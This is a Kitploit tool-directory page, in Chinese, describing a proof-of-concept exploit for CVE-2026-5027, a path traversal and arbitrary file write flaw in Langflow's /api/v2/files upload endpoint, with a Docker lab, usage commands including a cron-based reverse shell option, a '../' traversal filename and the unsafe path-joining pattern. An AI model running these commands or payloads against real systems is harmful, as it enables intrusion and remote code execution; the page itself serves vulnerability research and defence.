Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-5027 — CVE-2026-5027 的概念验证漏洞利用,该漏洞是 Langflow 的 /api/v2/files 端点中的路径遍历和任意文件写入漏洞,附带 Docker 实验环境和反向 shell 选项。 | Kitploit
工具/GitHubGitHub/yym8538/cve-2026-5027
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试远程访问工具
GitHubyym8538/cve-2026-5027

CVE-2026-5027

CVE-2026-5027 的概念验证漏洞利用,该漏洞是 Langflow 的 /api/v2/files 端点中的路径遍历和任意文件写入漏洞,附带 Docker 实验环境和反向 shell 选项。

查看仓库
11个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

本文是由 EQSTLab 发布的研究文章。

感谢 Yahia Hamza 报告并分析了此漏洞。

CVE-2026-5027

★ CVE-2026-5027 Langflow 路径遍历 / 任意文件写入 PoC ★ CVE-2026-5027 PoC 测试


描述

CVE-2026-5027:Langflow 任意文件写入漏洞

描述:Langflow <= 1.8.4 中存在路径遍历漏洞,攻击者可通过向 /api/v2/files 端点提供特制的 multipart filename,将任意文件写入预期上传目录之外的位置。在启用了自动登录或身份验证执行较弱的部署环境中,此问题可能被利用,通过将攻击者控制的内容写入敏感文件系统位置来实现远程代码执行。


实验环境搭建

使用 Docker 构建并运行易受攻击的环境:

构建镜像

root@kitploit:~
docker build -t cve-2026-5027 .

运行容器

root@kitploit:~
docker run --rm -it -p 9013:9013 --name cve-2026-5027 cve-2026-5027

使用方法

执行

root@kitploit:~
# 概念验证(将测试文件写入 /tmp/)
python3 CVE-2026-5027.py -t <TARGET>

# 通过 cron 任务获取反向 shell
python3 CVE-2026-5027.py -t <TARGET> --lhost <YOUR_IP> --lport 4444

分析

易受攻击的端点

root@kitploit:~
POST /api/v2/files

该问题存在的原因是上传功能信任客户端提供的 multipart filename 值。易受攻击的代码路径没有生成安全的服务器端存储名称,也没有将解析后的路径限制在专用上传目录内,而是允许 ../ 等遍历序列影响最终目标路径。

因此,攻击者可以逃逸预期的存储根目录,强制应用程序将文件写入服务器文件系统上的任意位置。

一个典型的利用流程如下:

  1. 通过正常登录或启用自动登录的部署获取访问令牌。
  2. 向 /api/v2/files 提交 multipart 上传请求。
  3. 提供包含路径遍历序列的特制 filename。
  4. 使 Langflow 将攻击者控制的内容写入预期存储目录之外。

这本质上是一个 CWE-22:对路径名的限制不恰当(路径遍历) 问题。

技术根本原因

该安全缺陷是由于在上传处理过程中对用户控制的文件路径清理和验证不足造成的。应用程序接受原始客户端文件名,并将其传入存储工作流,而没有充分执行路径规范化和包含性检查。

从防御角度来看,危险模式在概念上类似于以下内容:

root@kitploit:~
save_path = base_dir / file.filename

如果 file.filename 包含路径遍历组件,例如:

root@kitploit:~
../../../../tmp/poc.txt

最终解析的路径可能指向 base_dir 之外,从而实现任意文件写入。

为何重要

任意文件写入漏洞通常比标准的无限制上传问题更为严重,因为攻击者不仅控制文件内容,还控制目标路径。根据 Langflow 进程的运行时权限,这可能实现:

  • 覆盖应用程序文件
  • 修改启动或计划任务文件
  • 通过 shell 初始化文件或密钥文件实现持久化
  • 从任意文件写入升级为远程代码执行

场景

root@kitploit:~
+-------------------------------------------+
|                  攻击者                    |
+-------------------------------------------+
                      |
                      | 获取访问令牌
                      | 或滥用自动登录
                      v
+-------------------------------------------+
|        Langflow /api/v2/files             |
+-------------------------------------------+
                      |
                      | 特制 multipart filename
                      | (../ 目录遍历)
                      v
+-------------------------------------------+
| 任意文件写入(上传目录之外)                |
+-------------------------------------------+
                      |
                      | 写入敏感位置
                      v
+-------------------------------------------+
|      潜在的远程代码执行                    |
+-------------------------------------------+

免责声明

本仓库并非旨在促进对 Langflow 实例的未经授权利用。本项目的目的是帮助安全研究人员、防御者和开发人员了解该漏洞,在受控环境中验证暴露情况,并应用有效的缓解措施。


参考资料

https://www.tenable.com/security/research/tra-2026-26

https://www.cve.org/CVERecord?id=CVE-2026-5027

https://github.com/yahiahamza/CVE-2026-5027

https://github.com/langflow-ai/langflow

下载工具